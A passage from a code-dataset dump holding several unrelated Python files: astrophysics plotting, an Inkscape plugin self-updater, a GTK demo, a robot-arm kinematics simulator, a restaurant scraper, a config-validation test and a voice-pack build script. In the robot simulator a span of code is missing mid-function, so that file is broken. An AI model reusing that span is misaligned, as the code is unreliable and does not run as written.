4]\n plt.rcParams['axes.facecolor']= \t'whitesmoke'\n \n den_plot = np.nan_to_num(flat_den, nan = -1, neginf = -1)\n den_plot = np.log10(den_plot)\n den_plot = np.nan_to_num(den_plot, neginf= 0)\n \n # ax.set_xlim(-15_000, 2000)\n # ax.set_ylim(-4_000, 4000)\n ax.set_xlabel(r' X [$R_\\odot$]', fontsize = 14)\n ax.set_ylabel(r' Y [R$_\\odot$]', fontsize = 14)\n img = ax.pcolormesh(x_radii, y_radii, den_plot.T, cmap = 'jet',\n vmin = 0, vmax = 7)\n cb = plt.colorbar(img)\n cb.set_label(r'Density [g/cm$^2$]', fontsize = 14)\n ax.set_title('XY Projection', fontsize = 16)\n plt.show()\n ","repo_name":"KKilmetis8/tde_comparison","sub_path":"src/Projectors/projector_tree.py","file_name":"projector_tree.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27619519609","text":"#!/usr/bin/python\n\nimport sys\nsys.path.append('/usr/share/inkscape/extensions')\n\nimport inkex\nimport urllib\nimport json\nimport os\nimport re\nimport tempfile\nimport zipfile\nimport shutil\n\nfrom lc_version import __version__\n\nclass UpdateEffect(inkex.Effect):\n def __init__(self):\n inkex.Effect.__init__(self)\n self.OptionParser.add_option('--tab', action = 'store',\n type = 'string', dest = 'what')\n\n def effect(self):\n f = urllib.urlopen(\"https://raw.github.com/renaultd/lasercut/\" + \\\n \"master/lc_version.py\")\n j = f.read()\n if (re.match(\"__version__ = \\([0-9]+,[0-9]+,[0-9]+\\)\\n\",j)):\n vstr = re.findall(\"[a-z_]+ = \\(([0-9]+),([0-9]+),([0-9]+)\\)\\n\",j)[0]\n version = (int(vstr[0]),int(vstr[1]),int(vstr[2]))\n inkex.debug(\"Current version : \" + str(version))\n inkex.debug(\"Most recent version : \" + str(__version__))\n pwd = os.path.dirname(os.path.realpath(__file__))\n fd,zipn = tempfile.mkstemp()\n urllib.urlretrieve(\"https://api.github.com/repos/\" + \\\n \"renaultd/lasercut/zipball/\", zipn)\n zip = zipfile.ZipFile(zipn)\n ms = [ m for m in zip.namelist() if re.match(\".*\\.(py|inx)\",m) ]\n t = tempfile.mkdtemp()\n for m in ms:\n inkex.debug(m)\n zip.extract(m,t)\n shutil.copy(os.path.join(t,m), pwd)\n os.close(fd)\n os.remove(zipn)\n shutil.rmtree(t)\n else:\n inkex.debug(\"Unable to fetch distant repository\")\n\neffect = UpdateEffect()\neffect.affect()\n","repo_name":"allali/lasercut","sub_path":"lc_update.py","file_name":"lc_update.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29681950676","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nclass MainWindow(Gtk.Window):\n def __init__(self):\n Gtk.Window.__init__(self,title=\"ApplicationX\")\n \n #Boxes\n self.box = Gtk.Box(spacing=10)\n self.add(self.box)\n\n #bouton & entry\n self.bouton = Gtk.Button(label=\"test\")\n self.case = Gtk.Entry()\n self.bouton.connect(\"clicked\",self.bouton_clique)\n self.case.set_text(\"Texte\")\n self.box.pack_start(self.case,True,True,0)\n self.box.pack_start(self.bouton,True,True,0)\n \n\n def bouton_clique(self, widget):\n\t txt = self.case.get_text()\n\t print(txt)\n\n\nwindow = MainWindow()\nwindow.connect(\"delete-event\",Gtk.main_quit)\nwindow.show_all()\nGtk.main()\n","repo_name":"TuxStory/Python3","sub_path":"Python 3 GTK3 Tutoriel/Gtk_test1.py","file_name":"Gtk_test1.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70466883665","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom multiprocessing import Process, Queue\nimport time\nimport queue\nimport pandas as pd\nimport json\n\n\nclass Robot_Element:\n def update_dh_matrix(self, theta_i, sigma_i, lamda_i, alpha_i):\n dh_array = np.zeros((4, 4))\n\n dh_array[0][0] = np.cos(theta_i)\n dh_array[0][1] = -np.sin(theta_i)*np.cos(alpha_i)\n dh_array[0][2] = np.sin(theta_i)*np.sin(alpha_i)\n dh_array[0][3] = lamda_i*np.cos(alpha_i)\n\n dh_array[1][0] = np.sin(theta_i)\n dh_array[1][1] = np.cos(theta_i)*np.cos(alpha_i)\n dh_array[1][2] = -np.cos(theta_i)*np.sin(alpha_i)\n dh_array[1][3] = lamda_i*np.sin(alpha_i)\n\n dh_array[2][1] = np.sin(alpha_i)\n dh_array[2][2] = np.cos(alpha_i)\n dh_array[2][3] = sigma_i\n\n dh_array[3][3] = 1\n\n dh_matrix = np.matrix(dh_array)\n return dh_matrix\n\n\n def __init__(self, theta_i, sigma_i, lamda_i, alpha_i, dh_matrix_old=None):\n self.update(theta_i, sigma_i, lamda_i, alpha_i, dh_matrix_old)\n\n\n def update(self, theta_i, sigma_i, lamda_i, alpha_i, dh_matrix_old=None):\n self.dh_matrix = self.update_dh_matrix(theta_i, sigma_i, lamda_i, alpha_i)\n \n if dh_matrix_old is None:\n self.orientation_matrix = self.dh_matrix\n else:\n self.orientation_matrix = dh_matrix_old * self.dh_matrix\n\n self.point = [self.orientation_matrix[0, 3], # x\n self.orientation_matrix[1, 3], # y\n self.orientation_matrix[2, 3]] # z\n\n\n def get_orientation_matrix(self):\n return self.orientation_matrix\n\n\n def get_point(self):\n return self.point\n\n\nclass RRP_Robot:\n def __init__(self, oop_robot_data):\n # constant attributes\n elements_lengths_data = oop_robot_data[\"elements_lengths\"]\n self.l1 = elements_lengths_data[\"l1\"]\n self.l2 = elements_lengths_data[\"l2\"]\n\n # limitations\n limitations_data = oop_robot_data[\"limitations\"]\n self.theta1_min = limitations_data[\"theta1_min\"]\n self.theta1_max = limitations_data[\"theta1_max\"]\n self.theta2_min = limitations_data[\"theta2_min\"]\n self.theta2_max = limitations_data[\"theta2_max\"]\n self.sigma_min = limitations_data[\"sigma_min\"]\n self.sigma_max = limitations_data[\"sigma_max\"]\n\n # working area\n working_area_data = oop_robot_data[\"working_area\"]\n self.center = np.array(working_area_data[\"center\"])\n self.radius = working_area_data[\"radius\"]\n\n # variable attributes\n initial_position_data = oop_robot_data[\"initial_position\"]\n self.theta1 = initial_position_data[\"theta1\"]\n self.theta2 = initial_position_data[\"theta2\"]\n self.sigma = initial_position_data[\"sigma\"]\n\n # Denavit - Hartenberg notation array for RRP robot\n self.dh_notation_array = self.__create_dh_notation_array(self.theta1, self.theta2, self.sigma)\n\n # Create segments of RRP robot arm\n self.elements = self.__create_robot_elements(self.dh_notation_array)\n\n\n def __create_dh_notation_array(self, theta1, theta2, sigma):\n # Denavit - Hartenberg notation array for RRP robot\n # theta sigma lamda alpha\n dh_notation_array = np.array([[theta1, self.l1, 0, np.pi/2],\n [theta2, 0, 0, -np.pi/2],\n [-np.pi/2, 0, 0, 0 ],\n [0, 0, 0, -np.pi/2],\n [0, self.l2 + sigma, 0, 0]])\n return dh_notation_array\n\n\n def __create_robot_elements(self, dh_notation_array):\n elements = []\n for i in range(len(dh_notation_array)):\n theta_i, sigma_i, lambda_i, alpha_i = dh_notation_array[i]\n if i == 0:\n orientation_matrix = None\n else:\n orientation_matrix = elements[-1].get_orientation_matrix()\n element = Robot_Element(theta_i, sigma_i, lambda_i, alpha_i, orientation_matrix)\n elements.append(element)\n return elements\n\n\n def update(self, new_theta1, new_theta2, new_sigma):\n # Denavit - Hartenberg notation array for RRP robot\n self.dh_notation_array = self.__create_dh_notation_array(new_theta1, new_theta2, new_sigma)\n\n # Create segments of RRP robot arm\n self.elements = self.__create_robot_elements(self.dh_notation_array)\n\n\n def get_joint_points(self):\n points_x = [0] \n points_y = [0]\n points_z = [0]\n for element in self.elements:\n point = element.get_point()\n points_x.append(point[0])\n points_y.append(point[1])\n points_z.append(point[2])\n points_x_arr = np.array(points_x)\n points_y_arr = np.array(points_y)\n points_z_arr = np.array(points_z)\n return points_x_arr, points_y_arr, points_z_arr\n\n\n def __check_variables_borders(self):\n if self.theta1 < self.theta1_min:\n self.theta1 = self.theta1_min\n elif self.theta1 > self.theta1_max:\n self.theta1 = self.theta1_max\n\n if self.theta2 < self.theta2_min:\n self.theta2 = self.theta2_min\n elif self.theta2 > self.theta2_max:\n self.theta2 = self.theta2_max\n\n if self.sigma < self.sigma_min:\n self.sigma = self.sigma_min\n elif self.sigma > self.sigma_max:\n self.sigma = self.sigma_max\n\n\n def forward_kinematic(self, new_theta1, new_theta2, new_sigma):\n self.theta1 = new_theta1\n self.theta2 = new_theta2\n self.sigma = new_sigma\n self.__check_variables_borders()\n self.update(self.theta1, self.theta2, self.sigma)\n\n\n def inverse_kinematic(self, new_x, new_y, new_z):\n self.theta1, self.theta2, self.sigma = self.get_inverse_kinematic_variables(new_x, new_y, new_z)\n self.update(self.theta1, self.theta2, self.sigma)\n\n\n def get_inverse_kinematic_variables(self, new_x, new_y, new_z):\n theta1 = np.arctan2(new_y, new_x)\n sigma = np.sqrt(new_x**2 + new_y**2 + (new_z-self.l1)**2) - self.l2\n theta2 = np.arcsin((new_z - self.l1)/(self.l2 + sigma))\n return theta1, theta2, sigma\n\n\n def get_current_variables(self):\n return self.theta1, self.theta2, self.sigma\n\n\n def get_grasper_coordinates(self):\n x_arr, y_arr, z_arr = self.get_joint_points()\n return x_arr[-1], y_arr[-1], z_arr[-1]\n\n\n def check_if_outside_working_area(self):\n grasper_point = np.array(self.get_grasper_coordinates())\n distance = np.sqrt(np.sum((grasper_point-self.center)**2, axis=0))\n if distance > self.radius:\n return True\n else:\n return False\n\n\n def __plot_working_area(self, center=[1.5,0,1], radius=1, plane=0):\n points_per_ring = 20\n points_x = []\n points_y = []\n points_z = []\n for j in range(points_per_ring):\n if plane == 0:\n points_x.append(radius*np.cos(2*np.pi*j/points_per_ring)+center[0])\n points_y.append(radius*np.sin(2*np.pi*j/points_per_ring)+center[1])\n points_z.append(center[2])\n elif plane == 1:\n points_y.append(radius*np.cos(2*np.pi*j/points_per_ring)+center[1])\n points_z.append(radius*np.sin(2*np.pi*j/points_per_ring)+center[2])\n points_x.append(center[0])\n else:\n points_z.append(radius*np.cos(2*np.pi*j/points_per_ring)+center[2])\n points_x.append(radius*np.sin(2*np.pi*j/points_per_ring)+center[0])\n points_y.append(center[1])\n points_x.append(points_x[0])\n points_y.append(points_y[0])\n points_z.append(points_z[0])\n points_x_arr = np.array(points_x)\n points_y_arr = np.array(points_y)\n points_z_arr = np.array(points_z)\n return points_x_arr, points_y_arr, points_z_arr\n\n\n def plot_working_area(self, plane):\n return self.__plot_working_area(self.center, self.radius, plane)\n\n\nclass Visual_Controller:\n def __init__(self, rrp_robot, intermediate_thetas1, intermediate_thetas2, intermediate_sigmas):\n self.rrp_robot = rrp_robot\n self.update_ml_to_vis(intermediate_thetas1, intermediate_thetas2, intermediate_sigmas)\n\n\n def update_ml_to_vis(self, intermediate_thetas1, intermediate_thetas2, intermediate_sigmas):\n self.intermediate_thetas1 = intermediate_thetas1\n self.intermediate_thetas2 = intermediate_thetas2\n self.intermediate_sigmas = intermediate_sigmas\n self.intermediate_steps = len(intermediate_sigmas)\n self.block_visualization = False\n self.current_step = 0\n\n\n def update_vis_to_ml(self):\n self.block_visualization = True\n\n\n def increment_step(self):\n self.current_step+=1\n\n\ndef visual(qsv, qvs):\n class Pack:\n def __init__(self, visual_controller):\n self.visual_controller = visual_controller\n\n visual_controller = qsv.get()\n pack = Pack(visual_controller)\n\n # Prepare figure\n fig = plt.figure(num=None, figsize=(8, 6))\n ax = fig.gca(projection='3d')\n\n # not working anymore?\n # Set equal grid\n # extents = np.array([getattr(ax, 'get_{}lim'.format(dim))() for dim in 'xyz'])\n # sz = extents[:,1] - extents[:,0]\n # centers = np.mean(extents, axis=1)\n # maxsize = max(abs(sz))\n # r = maxsize/2\n # for ctr, dim in zip(centers, 'xyz'):\n # getattr(ax, 'set_{}lim'.format(dim))(ctr - r, ctr + r)\n\n # Line for robot\n line, = ax.plot([], [], [], 'b-o')\n line2, = ax.plot([], [], [], 'r')\n line3, = ax.plot([], [], [], 'r')\n line4, = ax.plot([], [], [], 'r')\n\n # Set axes\n ax.set_xlim([-3, 3])\n ax.set_ylim([-3, 3])\n ax.set_zlim([ 0, 3])\n ax.set_xlabel('X[m]')\n ax.set_ylabel('Y[m]')\n ax.set_zlabel('Z[m]')\n\n def print_useful_data(pack):\n # coordinates of all joints\n # all variables\n # grasper is in working area\n print(\"O>xxx<[=]>xxx<[=]>xxx<[=]>xxx<[=]>xxxxxx<[=]>xxx<[=]>xxx<[=]>xxx<[=]>xxx= pack.visual_controller.intermediate_steps:\n pack.visual_controller.update_vis_to_ml()\n qvs.put(pack.visual_controller)\n\n return line, line2\n\n # Run animation\n ani = animation.FuncAnimation(fig, animate, fargs=(pack,), interval=50, blit=False)\n plt.show()\n\n\ndef simulation(oop_robot_data):\n # Prepare objects for simulation and visualization\n rrp_robot = RRP_Robot(oop_robot_data)\n visual_controller = Visual_Controller(rrp_robot, [0], [0], [0])\n\n # Start plotting process\n qsv, qvs = Queue(), Queue()\n p = Process(target=visual, args=(qsv, qvs,))\n p.start()\n qsv.put(visual_controller)\n\n # Main loop of simulation \n while True:\n visual_controller = qvs.get()\n\n # Get variables values:\n print(\"Provide values:\")\n forward_or_inverse = int(input()) # 1->forward, 0->inverse\n new_theta1_or_new_x = float(input())\n new_theta2_or_new_y = float(input())\n new_sigma_or_new_z = float(input())\n intermediate_steps = int(input())\n # forward_or_inverse = 1 # 1->forward, 0->inverse\n # new_theta1_or_new_x = 90\n # new_theta2_or_new_y = 45\n # new_sigma_or_new_z = 0.75\n # intermediate_steps = 10\n\n # Get current variables values:\n old_theta1, old_theta2, old_sigma = visual_controller.rrp_robot.get_current_variables()\n\n # Prepare new variables values:\n if forward_or_inverse == 1: # Forward kinematic\n new_theta1 = np.deg2rad(new_theta1_or_new_x)\n new_theta2 = np.deg2rad(new_theta2_or_new_y)\n new_sigma = new_sigma_or_new_z\n else: # Inverse kinematic\n new_x, new_y, new_z = new_theta1_or_new_x, new_theta2_or_new_y,new_sigma_or_new_z\n new_theta1, new_theta2, new_sigma = visual_controller.rrp_robot.get_inverse_kinematic_variables(new_x, new_y, new_z)\n\n # Get intermediate variables values:\n intermediate_thetas1 = np.linspace(old_theta1, new_theta1, intermediate_steps)\n intermediate_thetas2 = np.linspace(old_theta2, new_theta2, intermediate_steps)\n intermediate_sigmas = np.linspace(old_sigma, new_sigma, intermediate_steps)\n\n visual_controller.update_ml_to_vis(intermediate_thetas1, intermediate_thetas2, intermediate_sigmas)\n qsv.put(visual_controller)\n\n p.join()\n\n\nif __name__ == \"__main__\":\n oop_robot_data = json.load(open(\"oop_robot_data.json\", \"r\"))\n simulation(oop_robot_data)","repo_name":"Zekhire/oop_robot_simulation","sub_path":"oop_robot_simulation.py","file_name":"oop_robot_simulation.py","file_ext":"py","file_size_in_byte":16448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13997088064","text":"from scrapy.spider import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\n\nfrom myproject.items import Restaurant\n\nclass TabelogSpoider(CrawlSpider):\n name = 'tabelog'\n allowed_domains = [\n \"tabelog.com\"\n ]\n start_urls = [\n 'https://tabelog.com/tokyo/rstLst/lunch/?LstCosT=2&RdoCosTp=1'\n ]\n rules = [\n Rule(LinkExtractor(allow=r'/\\w+/rstLst/lunch/\\d/')),\n Rule(LinkExtractor(allow=r'/\\w+/A\\d+/A\\d+/\\d+/$'), callback='parse_restaurant'),\n ]\n\n def parse_restaurant(self, response):\n latitude, longitude = response.css('img.js-map-lazyload::attr(\"data-original\")').re(r'markers=.*?%7C([\\d.]+),([\\d.]+)')\n\n item = Restaurant(\n name=response.css('.display-name').xpath('string()').extract_first().strip(),\n address=response.css('[class=\"rstinfo-table__address\"]').xpath('string()').extract_first(),\n latitude = latitude,\n longitude = longitude,\n station = response.css('[class=\"linktree__parent-target-text\"]').xpath('string()').extract_first(),\n score = response.css('[class=\"rdheader-rating__score-val-dtl\"]').xpath('string()').extract_first(),\n )\n\n return item","repo_name":"yohei29/myproject","sub_path":"myproject/spiders/tabelog.py","file_name":"tabelog.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19305827193","text":"import unittest\n\nimport jsonschema\nfrom lsst.ts import mtrotator, salobj\n\n\nclass ValidationTestCase(unittest.TestCase):\n \"\"\"Test validation of the config schema.\"\"\"\n\n def setUp(self):\n self.schema = mtrotator.CONFIG_SCHEMA\n self.validator = salobj.StandardValidator(schema=self.schema)\n self.default = dict(\n max_ccw_following_error=2.2,\n num_ccw_following_errors=3,\n host=\"rot-pxi-controller.cp.lsst.org\",\n port=5570,\n connection_timeout=10,\n )\n\n def test_basics(self):\n config = dict(\n max_ccw_following_error=1.5,\n num_ccw_following_errors=1,\n host=\"foo.bar\",\n port=25,\n connection_timeout=0.5,\n )\n self.validator.validate(config)\n\n def test_invalid_configs(self):\n for name, badval in (\n (\"max_ccw_following_error\", \"oops\"), # Wrong type\n (\"max_ccw_following_error\", 0), # Not positive\n (\"num_ccw_following_error\", \"oops\"), # Wrong type\n (\"num_ccw_following_error\", 0), # Not positive\n ):\n bad_data = {name: badval}\n with self.subTest(bad_data=bad_data):\n with self.assertRaises(jsonschema.exceptions.ValidationError):\n self.validator.validate(bad_data)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"lsst-ts/ts_mtrotator","sub_path":"tests/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15419226505","text":"import shutil\nfrom pathlib import Path\nimport os\n\n\n#define a function & pass dst. directory and src. directories\ndef merge_directories(new_directory_name, *directories_to_merge):\n if not os.path.exists(new_directory_name):\n os.makedirs(new_directory_name) #create a dst. directory if not exist\n\n for directory in directories_to_merge: \n for item in os.listdir(directory): #iterate sub-directory from source folders\n #join path of folder and sub-folder\n s = os.path.join(directory, item)\n d = os.path.join(new_directory_name, item)\n if os.path.isdir(s):\n if item in os.listdir(new_directory_name):\n files = os.listdir(s)\n for file in files: #iterate file from sub-folder\n j = os.path.join(s, file)\n k = os.path.join(d, file)\n shutil.copy2(j,k) #paste file in already existed sub-directory\n else:\n shutil.copytree(s, d) #create a sub-directory in dst directory then paste file\n else:\n shutil.copy2(s, d) #paste file in already existed sub-directory\n\nVPVEM_path = Path(\"G:\\World of Warcraft\\_retail_\\Interface\\AddOns\\DBM-VPVEM\")\nVPVEM_JSON_path = Path(\"G:\\World of Warcraft\\_retail_\\Interface\\AddOns\\DBM-VPVEM\\DBM-VPVEM-REF.json\")\nVPGEN_path = Path(\"G:\\Dev\\WOW-VoicePack-Generator\")\nADDON_path = Path(\"G:\\Dev\\DBM-VoicePack\")\nTMPDIR_path = Path(\"G:\\Dev\\WOW-VoicePack-Generator\\\\tmp-dbm-output\")\nSOUNDSDIR_path = Path(\"G:\\Dev\\WOW-VoicePack-Generator\\dbm-dictionaries\\sounds\")\n\ncmdoggfilesupdatevoicepack = VPGEN_path / \"scripts\" / \"cmd-oggfiles-update-voicepack.py\"\ncmdoggfilescreatevoicepack = VPGEN_path / \"scripts\" / \"cmd-oggfiles-create-voicepack.py\"\n\n\nparams = []\n\nEN_VP_JSON_PATH = VPGEN_path / \"dbm-dictionaries\" / \"dbm-vp-en.json\"\nFR_VP_JSON_PATH = VPGEN_path / \"dbm-dictionaries\" / \"dbm-vp-fr.json\"\n\ncfgFemaleFR = VPGEN_path / \"my-audio-configs\" / \"aws-fr-female-cfg.json\"\naddonFemaleFR = ADDON_path / \"DBM-VPFrenchFemale\"\nparams.append([cfgFemaleFR,addonFemaleFR,FR_VP_JSON_PATH])\n\ncfgMaleFR = VPGEN_path / \"my-audio-configs\" / \"aws-fr-male-cfg.json\"\naddonMaleFR = ADDON_path / \"DBM-VPFrenchMale\"\nparams.append([cfgMaleFR,addonMaleFR,FR_VP_JSON_PATH])\n\ncfgFemaleEN = VPGEN_path / \"my-audio-configs\" / \"aws-en-female-cfg.json\"\naddonFemaleEN = ADDON_path / \"DBM-VPEnglishFemale\"\nparams.append([cfgFemaleEN,addonFemaleEN,EN_VP_JSON_PATH])\n\ncfgMaleEN = VPGEN_path / \"my-audio-configs\" / \"aws-en-male-cfg.json\"\naddonMaleEN = ADDON_path / \"DBM-VPEnglishMale\"\nparams.append([cfgMaleEN,addonMaleEN,EN_VP_JSON_PATH])\n\n\n#Update pkg\nfor param in params:\n\n CFG = param[0]\n ADDON = param[1]\n VP_JSON_PATH = param[2]\n ADDON_JSON = ADDON / \"dictionary.json\"\n\n cmd = f\"python \\\"{cmdoggfilesupdatevoicepack}\\\" -c {CFG} {VP_JSON_PATH} {ADDON_JSON} -o {TMPDIR_path} -e AWS\"\n print(cmd)\n os.system(cmd)\n merge_directories(TMPDIR_path, SOUNDSDIR_path)\n merge_directories(ADDON, TMPDIR_path)\n shutil.rmtree(TMPDIR_path)\n os.mkdir(TMPDIR_path) \n\n# Generate all files\n# for param in params:\n\n# CFG = param[0]\n# ADDON = param[1]\n# VP_JSON_PATH = param[2]\n\n# cmd = f\"python \\\"{cmdoggfilescreatevoicepack}\\\" -e AWS -c {CFG} -o {TMPDIR_path} {VP_JSON_PATH}\"\n# print(cmd)\n# os.system(cmd)\n# merge_directories(TMPDIR_path, SOUNDSDIR_path)\n# merge_directories(ADDON, TMPDIR_path)\n# shutil.rmtree(TMPDIR_path)\n# os.mkdir(TMPDIR_path) \n ","repo_name":"acharnoz/DBM-VoicePack-FrenchFemale","sub_path":"scripts/update-voicepacks.py","file_name":"update-voicepacks.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9160279619","text":"from main import Job\nfrom tkinter import *\nroot=Tk()\n\nclass Aplicacao():\n def __init__(self):\n self.root=root\n self.Tela()\n self.Frame()\n self.BT()\n root.mainloop()\n def Tela(self):\n self.root.title('Alerta BTL')\n self.root.configure(background='black')\n self.root.geometry('300x200')\n self.root.maxsize(width=1280,height=1024)\n def Frame(self):\n self.Main=Frame(self.root,bg= 'white',highlightbackground='black')\n self.Main.place(relx= 0.01, rely=0.01, relwidth= 0.98, relheight=0.98)\n def BT(self):\n self.btaction=Button(self.Main,text='Disparar',command=Job)\n self.btaction.place(relx=0.25,rely=0.2,relwidth=0.5,relheight=0.2)\n\n def Quit(): self.root.destroy()\n self.btpara=Button(self.Main,text='Parar',command=Quit)\n self.btpara.place(relx=0.25, rely=0.6, relwidth=0.5, relheight=0.2)\n\nAplicacao()\n","repo_name":"santosgv/WebScript_observer","sub_path":"Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35021261885","text":"import SM\nimport re\nimport json\n\nf= json.loads(open('j.json').read()) \ng= json.loads(open('data.json').read())\n\na=SM.BuildStructure(f)\n#__SearchTree(a)\nb=SM.BuildStructure(g)\nSM.StructureMatch(a,b)\nprint(b.grade)\nprint(SM.SearchTree(b))\ndic=SM.SearchTree(b)\n\nexp_file=open('example.html','r')\nout_file=open('out.html','w')\nfor i in exp_file:\n tmp=i\n for key in dic:\n tmp=re.sub('\"'+key+'\"','\"'+dic[key]+'\"',tmp)\n print(tmp)\n print(tmp,end='',file=out_file)\nout_file.close()\nexp_file.close()\n","repo_name":"hikaInf155/HIKA","sub_path":"match/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23359977237","text":"import sys\nimport os\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\nfrom datetime import datetime\nimport unittest\nimport unittest.mock as mock\nfrom unittest.mock import patch\nfrom unittest.mock import MagicMock\nfrom flask_socketio import ConnectionRefusedError\nfrom sqlalchemy.exc import SQLAlchemyError\n\nsys.path.insert(1, join(dirname(__file__), \"../\"))\nfrom bot import Bot\nimport helper_functions as hf\nimport bot_helper_functions as bhf\nimport server_comms\nimport models\n\nproject_id = 1\nimage_id = 1\ngoogle_json = 1\n\n\ndotenv_path = join(dirname(__file__), \"../keys/sql.env\")\n\ndatabase_uri = os.getenv(\"DATABASE_URL\")\n\nTAG = \"tag\"\nMESSAGE = \"message\"\nMESSAGE_SENT = \"message_sent\"\nROOM = \"room\"\nCHANGE = \"change\"\nCOUNT = \"count\"\nRESULT = \"result\"\nEMAIL = \"email\"\nNAME = \"name\"\nMSG = \"msg\"\nMSG_TYPE = \"msg_type\"\nDATA = \"data\"\nDT = \"dt\"\nDT_NOW = datetime.strptime(\"2020-10-15 13:57:02.043000\", \"%Y-%m-%d %H:%M:%S.%f\")\nTYPE = \"type\"\nREPLY = \"reply\"\nERR_MSG = \"err_msg\"\nSID = \"sid\"\nIMG = \"img\"\nLANG = \"lang\"\nRESPONSE = \"response\"\n\n\nclass MockUser:\n email = \"\"\n name = \"\"\n img = \"\"\n\n def __init__(self, email, name, pic):\n self.email = email\n self.name = name\n self.pic = pic\n\n def __repr__(self):\n return \"%s %s %s\" % (self.email, self.name, self.pic)\n\n\nclass MockMessage:\n dt = \"\"\n email = \"\"\n message = \"\"\n msg_type = \"\"\n\n def __init__(self, dt, email, message, msg_type):\n self.date_time = dt\n self.email = email\n self.message = message\n self.msg_type = msg_type\n\n\nclass MockedUnitTests(unittest.TestCase):\n def setUp(self):\n harry = MockUser(\"harry@gmail.com\", \"harry\", \"banana.png\")\n bobby = MockUser(\"bob@gmail.com\", \"bobby\", \"apple.png\")\n\n self.mock_users = [harry, bobby]\n message1 = MockMessage(DT_NOW, harry.email, \"hi\", \"text\")\n message2 = MockMessage(DT_NOW, bobby.email, \"hey\", \"text\")\n message3 = MockMessage(DT_NOW, bobby.email, \"hey\", \"text\")\n\n self.mock_messages = [message1, message2, message3]\n\n self.sc = server_comms.ServerComms(\n database_uri, project_id, image_id, google_json\n )\n\n self.chatBot = Bot(project_id, image_id, google_json, \"static/Robot.png\")\n\n self.mock_image_search_json = {\n \"total\": 4692,\n \"totalHits\": 500,\n \"hits\": [\n {\n \"id\": 195893,\n \"pageURL\": \"https://pixabay.com/en/blossom-bloom-flower-195893/\",\n \"type\": \"photo\",\n \"tags\": \"blossom, bloom, flower\",\n \"previewURL\": \"https://cdn.pixabay.com/photo/2013/10/15/09/12/flower-195893_150.jpg\",\n \"previewWidth\": 150,\n \"previewHeight\": 84,\n \"webformatURL\": \"https://pixabay.com/get/35bbf209e13e39d2_640.jpg\",\n \"webformatWidth\": 640,\n \"webformatHeight\": 360,\n \"largeImageURL\": \"https://pixabay.com/get/ed6a99fd0a76647_1280.jpg\",\n \"fullHDURL\": \"https://pixabay.com/get/ed6a9369fd0a76647_1920.jpg\",\n \"imageURL\": \"https://pixabay.com/get/ed6a9364a9fd0a76647.jpg\",\n \"imageWidth\": 4000,\n \"imageHeight\": 2250,\n \"imageSize\": 4731420,\n \"views\": 7671,\n \"downloads\": 6439,\n \"favorites\": 1,\n \"likes\": 5,\n \"comments\": 2,\n \"user_id\": 48777,\n \"user\": \"Josch13\",\n \"userImageURL\": \"https://cdn.pixabay.com/user/2013/11/05/02-10-23-764_250x250.jpg\",\n },\n {\"id\": 73424},\n ],\n }\n\n self.mock_image_search_json_error = self.mock_image_search_json.copy()\n self.mock_image_search_json_error.pop(\"totalHits\")\n\n self.success_send_message = [\n {TAG: \"connected\", MESSAGE: \"hello\", ROOM: None},\n {TAG: \"connected\", MESSAGE: \"hello\", ROOM: 1},\n ]\n\n self.success_update_room_count = [\n {CHANGE: 1, COUNT: 1, RESULT: 2},\n {CHANGE: -1, COUNT: 2, RESULT: 1},\n {CHANGE: -1, COUNT: 0, RESULT: 0},\n ]\n\n self.failure_send_message = [\n {TAG: \"connected\", MESSAGE: \"hello\", ROOM: None},\n {TAG: \"connected\", MESSAGE: \"hello\", ROOM: 1},\n ]\n\n self.success_record_message = [\n {EMAIL: \"r123@gmail.com\", MESSAGE: \"hi\", MSG_TYPE: \"text\", DT: DT_NOW}\n ]\n\n self.failure_record_message = [\n {EMAIL: \"r123@gmail.com\", MESSAGE: \"hi\", MSG_TYPE: \"text\", DT: DT_NOW}\n ]\n\n self.success_received_message = [\n {\n DATA: {\n EMAIL: \"r1@gmail.com\",\n DT: str(DT_NOW),\n MSG: \"hi\",\n MSG_TYPE: \"text\",\n }\n }\n ]\n\n self.success_chatbot_response = [\n {MSG: \"!! image rose\", REPLY: {TYPE: \"img\", DATA: \"rose.png\"}}\n ]\n\n self.failure_chatbot_response = [\n {\n MSG: \"!! image rose\",\n DT: DT_NOW,\n REPLY: {TYPE: \"img\", DATA: None},\n ERR_MSG: \"Bot experienced an error.\" \"Sorry for the inconvenience\",\n },\n {MSG: \"!! image rose\", DT: DT_NOW, REPLY: {TYPE: None, DATA: None}},\n ]\n\n self.success_on_connect = [{SID: 5}]\n\n self.success_check_if_user_exists = [\n {EMAIL: \"s1@njit.edu\", RESULT: False},\n {EMAIL: \"harry@gmail.com\", RESULT: True},\n ]\n\n self.failure_check_if_user_exists = [{EMAIL: \"s1@njit.edu\", RESULT: False}]\n\n self.success_create_user_entry = [\n {EMAIL: \"s1@njit.edu\", NAME: \"sarah\", IMG: 